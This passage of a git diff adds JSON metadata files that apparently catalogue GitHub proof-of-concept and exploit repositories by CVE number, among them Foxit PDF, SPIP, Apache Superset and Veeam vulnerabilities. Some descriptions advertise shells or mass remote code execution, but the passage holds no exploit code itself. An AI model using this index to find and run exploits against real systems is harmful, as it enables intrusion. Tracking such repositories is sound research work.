"https:\/\/github.com\/rasan2001\/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-05-10T16:14:22Z", + "updated_at": "2024-08-01T14:12:13Z", + "pushed_at": "2024-05-10T16:15:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27363.json b/2023/CVE-2023-27363.json new file mode 100644 index 0000000000..61c5466688 --- /dev/null +++ b/2023/CVE-2023-27363.json @@ -0,0 +1,95 @@ +[ + { + "id": 641026084, + "name": "CVE-2023-27363", + "full_name": "qwqdanchun\/CVE-2023-27363", + "owner": { + "login": "qwqdanchun", + "id": 48477028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48477028?v=4", + "html_url": "https:\/\/github.com\/qwqdanchun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qwqdanchun\/CVE-2023-27363", + "description": null, + "fork": false, + "created_at": "2023-05-15T16:09:19Z", + "updated_at": "2023-08-13T19:36:12Z", + "pushed_at": "2023-08-13T23:30:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653394072, + "name": "CVE-2023-27363", + "full_name": "webraybtl\/CVE-2023-27363", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2023-27363", + "description": "福昕Foxit PDF远程代码执行漏洞CVE-2023-27363分析与复现", + "fork": false, + "created_at": "2023-06-14T01:18:09Z", + "updated_at": "2024-03-21T06:47:15Z", + "pushed_at": "2023-07-06T06:34:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 702915781, + "name": "-Foxit-PDF-CVE-2023-27363-", + "full_name": "CN016\/-Foxit-PDF-CVE-2023-27363-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/-Foxit-PDF-CVE-2023-27363-", + "description": "福昕Foxit PDF远程代码执行漏洞(CVE-2023-27363)", + "fork": false, + "created_at": "2023-10-10T08:52:08Z", + "updated_at": "2023-10-10T08:52:09Z", + "pushed_at": "2023-10-10T09:03:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27372.json b/2023/CVE-2023-27372.json new file mode 100644 index 0000000000..67e4f90bdf --- /dev/null +++ b/2023/CVE-2023-27372.json @@ -0,0 +1,269 @@ +[ + { + "id": 655758961, + "name": "CVE-2023-27372", + "full_name": "nuts7\/CVE-2023-27372", + "owner": { + "login": "nuts7", + "id": 66285128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66285128?v=4", + "html_url": "https:\/\/github.com\/nuts7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuts7\/CVE-2023-27372", + "description": "SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.", + "fork": false, + "created_at": "2023-06-19T14:36:47Z", + "updated_at": "2024-10-20T23:56:38Z", + "pushed_at": "2024-10-13T21:08:54Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-27372", + "cve2023", + "deserialization", + "exploit", + "nuclei", + "nuclei-templates", + "php", + "poc", + "rce", + "remote-code-execution", + "spip", + "vulnerability", + "web-hacking" + ], + "visibility": "public", + "forks": 7, + "watchers": 64, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 658452469, + "name": "CVE-2023-27372", + "full_name": "Chocapikk\/CVE-2023-27372", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-27372", + "description": "SPIP Vulnerability Scanner - CVE-2023-27372 Detector", + "fork": false, + "created_at": "2023-06-25T19:30:08Z", + "updated_at": "2024-08-03T01:37:43Z", + "pushed_at": "2023-09-16T23:13:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 661062372, + "name": "CVE-2023-27372", + "full_name": "dream434\/CVE-2023-27372", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2023-27372", + "description": "spip", + "fork": false, + "created_at": "2023-07-01T17:08:36Z", + "updated_at": "2024-08-02T12:55:02Z", + "pushed_at": "2024-08-02T12:54:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662629965, + "name": "CVE-2023-27372-PoC", + "full_name": "0SPwn\/CVE-2023-27372-PoC", + "owner": { + "login": "0SPwn", + "id": 103416140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103416140?v=4", + "html_url": "https:\/\/github.com\/0SPwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0SPwn\/CVE-2023-27372-PoC", + "description": "This is a PoC for CVE-2023-27372 which spawns a fully interactive shell. ", + "fork": false, + "created_at": "2023-07-05T14:41:03Z", + "updated_at": "2024-10-14T08:56:46Z", + "pushed_at": "2023-07-05T14:42:24Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665042042, + "name": "CVE-2023-27372-POC", + "full_name": "izzz0\/CVE-2023-27372-POC", + "owner": { + "login": "izzz0", + "id": 88706802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88706802?v=4", + "html_url": "https:\/\/github.com\/izzz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/izzz0\/CVE-2023-27372-POC", + "description": "CVE-2023-27372-SPIP-CMS-Bypass", + "fork": false, + "created_at": "2023-07-11T10:00:04Z", + "updated_at": "2023-07-19T03:20:54Z", + "pushed_at": "2023-07-12T05:14:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673080065, + "name": "CVE-2023-27372", + "full_name": "ThatNotEasy\/CVE-2023-27372", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27372", + "description": "Perform With Mass Remote Code Execution In SPIP Version (4.2.1)", + "fork": false, + "created_at": "2023-07-31T20:32:36Z", + "updated_at": "2024-08-12T20:32:18Z", + "pushed_at": "2023-07-31T20:54:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce-exploit", + "remote-code-execution", + "spip-plugin" + ], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 688571632, + "name": "CVE-2023-27372-PoC", + "full_name": "redboltsec\/CVE-2023-27372-PoC", + "owner": { + "login": "redboltsec", + "id": 144297535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144297535?v=4", + "html_url": "https:\/\/github.com\/redboltsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redboltsec\/CVE-2023-27372-PoC", + "description": "This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.", + "fork": false, + "created_at": "2023-09-07T16:17:03Z", + "updated_at": "2023-09-07T16:20:50Z", + "pushed_at": "2023-09-07T16:20:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843121866, + "name": "CVE-2023-27372", + "full_name": "1amthebest1\/CVE-2023-27372", + "owner": { + "login": "1amthebest1", + "id": 165074489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165074489?v=4", + "html_url": "https:\/\/github.com\/1amthebest1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1amthebest1\/CVE-2023-27372", + "description": null, + "fork": false, + "created_at": "2024-08-15T20:36:59Z", + "updated_at": "2024-08-15T20:39:41Z", + "pushed_at": "2024-08-15T20:39:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2744.json b/2023/CVE-2023-2744.json new file mode 100644 index 0000000000..1ebd603cfc --- /dev/null +++ b/2023/CVE-2023-2744.json @@ -0,0 +1,33 @@ +[ + { + "id": 737479723, + "name": "CVE-2023-2744", + "full_name": "pashayogi\/CVE-2023-2744", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/CVE-2023-2744", + "description": "Mass CVE-2023-2744", + "fork": false, + "created_at": "2023-12-31T07:27:17Z", + "updated_at": "2024-08-12T20:33:08Z", + "pushed_at": "2023-12-31T07:30:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27470.json b/2023/CVE-2023-27470.json new file mode 100644 index 0000000000..98fad2f793 --- /dev/null +++ b/2023/CVE-2023-27470.json @@ -0,0 +1,33 @@ +[ + { + "id": 689935383, + "name": "CVE-2023-27470_Exercise", + "full_name": "3lp4tr0n\/CVE-2023-27470_Exercise", + "owner": { + "login": "3lp4tr0n", + "id": 32691065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32691065?v=4", + "html_url": "https:\/\/github.com\/3lp4tr0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3lp4tr0n\/CVE-2023-27470_Exercise", + "description": null, + "fork": false, + "created_at": "2023-09-11T08:04:08Z", + "updated_at": "2024-09-16T13:10:16Z", + "pushed_at": "2023-09-11T09:00:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27524.json b/2023/CVE-2023-27524.json new file mode 100644 index 0000000000..a59bb66356 --- /dev/null +++ b/2023/CVE-2023-27524.json @@ -0,0 +1,387 @@ +[ + { + "id": 632280900, + "name": "CVE-2023-27524", + "full_name": "horizon3ai\/CVE-2023-27524", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27524", + "description": "Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset", + "fork": false, + "created_at": "2023-04-25T04:59:05Z", + "updated_at": "2024-10-15T20:34:53Z", + "pushed_at": "2023-09-09T01:20:49Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 104, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 633268252, + "name": "Superset_auth_bypass_check", + "full_name": "Okaytc\/Superset_auth_bypass_check", + "owner": { + "login": "Okaytc", + "id": 50813688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813688?v=4", + "html_url": "https:\/\/github.com\/Okaytc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Okaytc\/Superset_auth_bypass_check", + "description": "Apahce-Superset身份认证绕过漏洞(CVE-2023-27524)检测工具", + "fork": false, + "created_at": "2023-04-27T06:21:00Z", + "updated_at": "2023-09-28T15:09:36Z", + "pushed_at": "2023-08-03T09:52:22Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633292629, + "name": "CVE-2023-27524", + "full_name": "ZZ-SOCMAP\/CVE-2023-27524", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2023-27524", + "description": "Apache Superset Auth Bypass Vulnerability CVE-2023-27524.", + "fork": false, + "created_at": "2023-04-27T07:31:40Z", + "updated_at": "2024-09-19T01:43:06Z", + "pushed_at": "2023-04-27T07:31:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 636271031, + "name": "CVE-2023-27524-POC", + "full_name": "MaanVader\/CVE-2023-27524-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-27524-POC", + "description": "A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.", + "fork": false, + "created_at": "2023-05-04T13:29:09Z", + "updated_at": "2023-05-04T13:37:40Z", + "pushed_at": "2023-05-04T13:36:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636446962, + "name": "CVE-2023-27524", + "full_name": "ThatNotEasy\/CVE-2023-27524", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27524", + "description": "Perform With Apache-SuperSet Leaked Token [CSRF]", + "fork": false, + "created_at": "2023-05-04T21:43:48Z", + "updated_at": "2024-08-12T20:31:11Z", + "pushed_at": "2023-07-24T22:23:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "csrf-tokens", + "superset" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 637902693, + "name": "CVE-2023-27524", + "full_name": "TardC\/CVE-2023-27524", + "owner": { + "login": "TardC", + "id": 16506022, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16506022?v=4", + "html_url": "https:\/\/github.com\/TardC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TardC\/CVE-2023-27524", + "description": "Apache Superset Auth Bypass (CVE-2023-27524)", + "fork": false, + "created_at": "2023-05-08T16:50:08Z", + "updated_at": "2024-11-19T12:13:21Z", + "pushed_at": "2023-05-09T03:13:59Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685257815, + "name": "CVE-2023-27524", + "full_name": "necroteddy\/CVE-2023-27524", + "owner": { + "login": "necroteddy", + "id": 37003131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4", + "html_url": "https:\/\/github.com\/necroteddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/necroteddy\/CVE-2023-27524", + "description": "CVE-2023-27524", + "fork": false, + "created_at": "2023-08-30T20:59:28Z", + "updated_at": "2023-08-30T21:00:37Z", + "pushed_at": "2023-08-30T21:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 688800024, + "name": "CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "full_name": "jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "description": null, + "fork": false, + "created_at": "2023-09-08T06:15:00Z", + "updated_at": "2024-11-07T18:03:30Z", + "pushed_at": "2023-09-11T06:49:19Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702903633, + "name": "Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "full_name": "CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "description": "Apache Superset 默认SECRET_KEY 漏洞(CVE-2023-27524)", + "fork": false, + "created_at": "2023-10-10T08:23:57Z", + "updated_at": "2023-10-10T08:34:01Z", + "pushed_at": "2023-10-10T08:33:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711672389, + "name": "Research-CVE-2023-27524", + "full_name": "h1n4mx0\/Research-CVE-2023-27524", + "owner": { + "login": "h1n4mx0", + "id": 116544941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116544941?v=4", + "html_url": "https:\/\/github.com\/h1n4mx0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1n4mx0\/Research-CVE-2023-27524", + "description": "CVE-2023-27524", + "fork": false, + "created_at": "2023-10-30T00:27:20Z", + "updated_at": "2023-10-30T00:27:21Z", + "pushed_at": "2023-10-30T01:15:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799192194, + "name": "CVE-2023-27524", + "full_name": "karthi-the-hacker\/CVE-2023-27524", + "owner": { + "login": "karthi-the-hacker", + "id": 33289300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2023-27524", + "description": "Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)", + "fork": false, + "created_at": "2024-05-11T12:19:55Z", + "updated_at": "2024-06-25T13:42:04Z", + "pushed_at": "2024-05-11T12:23:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799195135, + "name": "CVE-2023-27524", + "full_name": "Cappricio-Securities\/CVE-2023-27524", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-27524", + "description": "Apache Superset - Authentication Bypass", + "fork": false, + "created_at": "2024-05-11T12:29:08Z", + "updated_at": "2024-06-24T07:07:58Z", + "pushed_at": "2024-06-24T07:06:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-superset", + "apache-superset---authentication-bypass", + "authentication-bypass", + "bugbounty", + "cve-2023-2752", + "pentesting", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27532.json b/2023/CVE-2023-27532.json new file mode 100644 index 0000000000..17129bf8e1 --- /dev/null +++ b/2023/CVE-2023-27532.json @@ -0,0 +1,95 @@ +[ + { + "id": 615769954, + "name": "CVE-2023-27532", + "full_name": "horizon3ai\/CVE-2023-27532", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27532", + "description": "POC for Veeam Backup and Replication CVE-2023-27532", + "fork": false, + "created_at": "2023-03-18T16:20:53Z", + "updated_at": "2024-11-20T10:29:15Z", + "pushed_at": "2023-03-28T18:21:55Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 62, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 618036087, + "name": "CVE-2023-27532", + "full_name": "sfewer-r7\/CVE-2023-27532", + "owner": { + "login": "sfewer-r7", + "id": 122022313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122022313?v=4", + "html_url": "https:\/\/github.com\/sfewer-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sfewer-r7\/CVE-2023-27532", + "description": "Exploit for CVE-2023-27532 against Veeam Backup & Replication", + "fork": false, + "created_at": "2023-03-23T16:08:43Z", + "updated_at": "2024-09-05T16:25:34Z", + "pushed_at": "2023-03-23T18:03:27Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 102, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 824610391, + "name": "CVE-2023-27532-RCE-Only", + "full_name": "puckiestyle\/CVE-2023-27532-RCE-Only", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-27532-RCE-Only", + "description": null, + "fork": false, + "created_at": "2024-07-05T14:00:48Z", + "updated_at": "2024-07-10T11:34:46Z", + "pushed_at": "2024-07-10T11:34:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27564.json b/2023/CVE-2023-27564.json new file mode 100644 index 0000000000..b016825cf6 --- /dev/null +++ b/2023/CVE-2023-27564.json @@ -0,0 +1,33 @@ +[ + { + "id": 781230884, + "name": "exploit-CVE-2023-27564", + "full_name": "david-botelho-mariano\/exploit-CVE-2023-27564", + "owner": { + "login": "david-botelho-mariano", + "id": 48680041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4", + "html_url": "https:\/\/github.com\/david-botelho-mariano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2023-27564", + "description": null, + "fork": false, + "created_at": "2024-04-03T01:45:18Z", + "updated_at": "2024-04-03T01:45:18Z", + "pushed_at": "2024-04-03T01:56:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27566.json b/2023/CVE-2023-27566.json new file mode 100644 index 0000000000..03459ce734 --- /dev/null +++ b/2023/CVE-2023-27566.json @@ -0,0 +1,40 @@ +[ + { + "id": 608920501, + "name": "moc3ingbird", + "full_name": "OpenL2D\/moc3ingbird", + "owner": { + "login": "OpenL2D", + "id": 110206125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110206125?v=4", + "html_url": "https:\/\/github.com\/OpenL2D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenL2D\/moc3ingbird", + "description": "MOC3ingbird Exploit for Live2D (CVE-2023-27566)", + "fork": false, + "created_at": "2023-03-03T01:57:28Z", + "updated_at": "2024-10-17T13:58:58Z", + "pushed_at": "2023-09-19T01:12:41Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": true, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "live2d", + "live2d-cubism", + "live2d-cubism-sdk", + "moc3", + "security-vulnerability" + ], + "visibility": "public", + "forks": 6, + "watchers": 79, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27587.json b/2023/CVE-2023-27587.json new file mode 100644 index 0000000000..7ee94662d8 --- /dev/null +++ b/2023/CVE-2023-27587.json @@ -0,0 +1,33 @@ +[ + { + "id": 614448985, + "name": "CVE-2023-27587-PoC", + "full_name": "vagnerd\/CVE-2023-27587-PoC", + "owner": { + "login": "vagnerd", + "id": 4332906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4332906?v=4", + "html_url": "https:\/\/github.com\/vagnerd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vagnerd\/CVE-2023-27587-PoC", + "description": "The simple PoC of CVE-2023-27587", + "fork": false, + "created_at": "2023-03-15T15:52:20Z", + "updated_at": "2024-01-17T16:04:31Z", + "pushed_at": "2023-03-31T16:44:01Z", + "stargazers_count": 6, + "watchers_count": 6, 